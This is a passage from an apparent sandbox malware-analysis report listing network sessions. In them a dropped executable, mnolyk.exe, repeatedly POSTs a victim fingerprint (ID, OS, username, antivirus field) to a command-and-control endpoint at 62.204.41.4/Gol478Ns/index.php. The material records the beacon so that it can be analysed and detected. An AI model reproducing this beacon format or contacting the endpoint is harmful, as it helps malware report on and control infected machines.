                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:10.372134924 CET344INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:10 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            156192.168.2.44985162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:10.567171097 CET345OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:10.634892941 CET345INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:10 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            157192.168.2.44985262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:10.929233074 CET346OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:10.994447947 CET346INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:10 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            158192.168.2.44985362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:11.209207058 CET347OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:11.274975061 CET347INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:11 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            159192.168.2.44985462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:11.554320097 CET348OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:11.617574930 CET348INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:11 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            16192.168.2.44971162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:28.358985901 CET205OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:28.420788050 CET205INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:28 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            160192.168.2.44985562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:12.691905022 CET349OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:12.758178949 CET349INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:12 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            161192.168.2.44985662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:12.965502024 CET350OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:13.029299974 CET350INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:12 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            162192.168.2.44985762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:13.235521078 CET351OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:13.301399946 CET351INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:13 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            163192.168.2.44985862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:14.073652029 CET352OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:14.140455008 CET352INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:14 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            164192.168.2.44985962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:14.384505987 CET353OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:14.448601961 CET353INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:14 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            165192.168.2.44986062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:15.268342972 CET354OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:15.334136009 CET354INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:15 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            166192.168.2.44986162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:15.536359072 CET355OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:15.598979950 CET355INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:15 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            167192.168.2.44986262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:15.775839090 CET356OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:15.839797020 CET356INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:15 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            168192.168.2.44986362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:16.006052971 CET357OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:16.070940018 CET357INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:16 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            169192.168.2.44986462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:16.250245094 CET358OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:16.312988043 CET358INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:16 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            17192.168.2.44971262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:28.587243080 CET206OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:28.651802063 CET206INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:28 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            170192.168.2.44986562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:16.496279955 CET359OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:16.558892965 CET359INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:16 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            171192.168.2.44986662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:16.739355087 CET360OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:16.801388979 CET360INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:16 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            172192.168.2.44986762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:16.999762058 CET361OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:17.067038059 CET361INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:17 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            173192.168.2.44986862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:17.239443064 CET362OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:17.306087017 CET362INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:17 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            174192.168.2.44986962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:17.481259108 CET363OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
